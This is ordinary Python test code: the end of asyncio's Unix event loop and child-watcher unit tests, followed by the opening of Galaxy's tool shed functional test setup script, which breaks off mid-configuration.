tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
def test_close_closing(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof()
self.assertTrue(tr._closing)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr._closing)
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
self.loop = test_utils.TestLoop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
# here the FastChildWatche enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = test_utils.TestLoop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = test_utils.TestLoop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests (ChildWatcherTestsMixin, unittest.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests (ChildWatcherTestsMixin, unittest.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
self.assertIsNone(watcher._loop)
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_with_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(watcher._loop, loop)
loop.close()
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
watcher = policy.get_child_watcher()
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
if __name__ == '__main__':
unittest.main()
|
functional_tests.py
|
#!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import re
import string
import multiprocessing
import unittest
import time
import sys
import threading
import random
import httplib
import socket
import urllib
import atexit
import logging
import os
import sys
import tempfile
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
tool_shed_home_directory = os.path.join( cwd, 'test', 'tool_shed' )
default_tool_shed_test_file_dir = os.path.join( tool_shed_home_directory, 'test_data' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
tool_shed_test_tmp_dir = os.path.join( tool_shed_home_directory, 'tmp' )
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from galaxy import eggs, model
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
# This should not be required, but it is under certain conditions, thanks to this bug: http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import twill
from paste import httpserver
# This is for the tool shed application.
import galaxy.webapps.tool_shed.app
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from galaxy.webapps.tool_shed import buildapp as toolshedbuildapp
# This is for the galaxy application.
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.web import buildapp as galaxybuildapp
from galaxy.util import asbool
from galaxy.util.json import to_json_string
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
from functional import database_contexts
log = logging.getLogger( "tool_shed_functional_tests.py" )
default_tool_shed_test_host = "localhost"
default_tool_shed_test_port_min = 8000
default_tool_shed_test_port_max = 8999
default_tool_shed_locales = 'en'
default_galaxy_test_port_min = 9000
default_galaxy_test_port_max = 9999
default_galaxy_test_host = 'localhost'
# Use separate databases for Galaxy and tool shed install info by default,
# set GALAXY_TEST_INSTALL_DB_MERGED to True to revert to merged databases
# behavior.
default_install_db_merged = False
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
#TODO: these should be copied from universe_wsgi.ini
return dict(
#TODO: static_enabled needed here?
static_enabled = True,
static_cache_time = 360,
static_dir = static_dir,
static_images_dir = os.path.join( static_dir, 'images', '' ),
static_favicon_dir = os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir = os.path.join( static_dir, 'scripts', '' ),
static_style_dir = os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt = os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
tool_sheds_conf_xml_template = '''<?xml version="1.0"?>
<tool_sheds>
<tool_shed name="Galaxy main tool shed" url="http://toolshed.g2.bx.psu.edu/"/>
<tool_shed name="Galaxy test tool shed" url="http://testtoolshed.g2.bx.psu.edu/"/>
<tool_shed name="Embedded tool shed for functional tests" url="http://${shed_url}:${shed_port}/"/>
</tool_sheds>
'''
shed_tool_conf_xml_template = '''<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
'''
tool_conf_xml = '''<?xml version="1.0"?>
<toolbox>
<section name="Get Data" id="getext">
<tool file="data_source/upload.xml"/>
</section>
</toolbox>
'''
tool_data_table_conf_xml_template = '''<?xml version="1.0"?>
<tables>
</tables>
'''
shed_data_manager_conf_xml_template = '''<?xml version="1.0"?>
<data_managers>
</data_managers>
'''
def run_tests( test_config ):
loader = nose.loader.TestLoader( config=test_config )
plug_loader = test_config.plugins.prepareTestLoader( loader )
if plug_loader is not None:
loader = plug_loader
tests = loader.loadTestsFromNames( test_config.testNames )
test_runner = nose.core.TextTestRunner( stream=test_config.stream,
verbosity=test_config.verbosity,
config=test_config )
plug_runner = test_config.plugins.prepareTestRunner( test_runner )
if plug_runner is not None:
test_runner = plug_runner
return test_runner.run( tests )
def main():
# ---- Configuration ------------------------------------------------------
tool_shed_test_host = os.environ.get( 'TOOL_SHED_TEST_HOST', default_tool_shed_test_host )
tool_shed_test_port = os.environ.get( 'TOOL_SHED_TEST_PORT', None )
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
tool_path = os.environ.get( 'TOOL_SHED_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_tool_shed_locales
tool_shed_test_file_dir = os.environ.get( 'TOOL_SHED_TEST_FILE_DIR', default_tool_shed_test_file_dir )
if not os.path.isabs( tool_shed_test_file_dir ):
tool_shed_test_file_dir = tool_shed_test_file_dir
ignore_files = ()
tool_dependency_dir = os.environ.get( 'TOOL_SHED_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'TOOL_SHED_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( tool_shed_test_tmp_dir ):
os.mkdir( tool_shed_test_tmp_dir )
tool_shed_test_proxy_port = None
galaxy_test_proxy_port = None
if 'TOOL_SHED_TEST_DBPATH' in os.environ:
shed_db_path = os.environ[ 'TOOL_SHED_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
shed_db_path = os.path.join( tempdir, 'database' )
shed_tool_data_table_conf_file = os.environ.get( 'TOOL_SHED_TEST_TOOL_DATA_TABLE_CONF', os.path.join( tool_shed_test_tmp_dir, 'shed_tool_data_table_conf.xml' ) )
galaxy_shed_data_manager_conf_file = os.environ.get( 'GALAXY_SHED_DATA_MANAGER_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_shed_data_manager_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_DATA_TABLE_CONF', os.path.join( tool_shed_test_tmp_dir, 'tool_data_table_conf.xml' ) )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_TEST_SHED_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_TEST_MIGRATED_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_SHEDS_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_sheds_conf.xml' ) )
if 'GALAXY_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
os.environ[ 'GALAXY_TEST_TOOL_DATA_PATH' ] = tool_data_path
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
shed_file_path = os.path.join( shed_db_path, 'files' )
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
hgweb_config_file_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
new_repos_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_shed_tool_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_tool_dependency_dir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
os.environ[ 'GALAXY_TEST_TOOL_DEPENDENCY_DIR' ] = galaxy_tool_dependency_dir
hgweb_config_dir = hgweb_config_file_path
os.environ[ 'TEST_HG_WEB_CONFIG_DIR' ] = hgweb_config_dir
print "Directory location for hgweb.config:", hgweb_config_dir
if 'TOOL_SHED_TEST_DBURI' in os.environ:
toolshed_database_connection = os.environ[ 'TOOL_SHED_TEST_DBURI' ]
else:
toolshed_database_connection = 'sqlite:///' + os.path.join( shed_db_path, 'community_test.sqlite' )
galaxy_database_auto_migrate = False
if 'GALAXY_TEST_DBURI' in os.environ:
galaxy_database_connection = os.environ[ 'GALAXY_TEST_DBURI' ]
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
galaxy_database_auto_migrate = True
galaxy_database_connection = 'sqlite:///%s' % db_path
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ[ 'GALAXY_TEST_INSTALL_DBURI' ]
elif asbool( os.environ.get( 'GALAXY_TEST_INSTALL_DB_MERGED', default_install_db_merged ) ):
install_galaxy_database_connection = galaxy_database_connection
else:
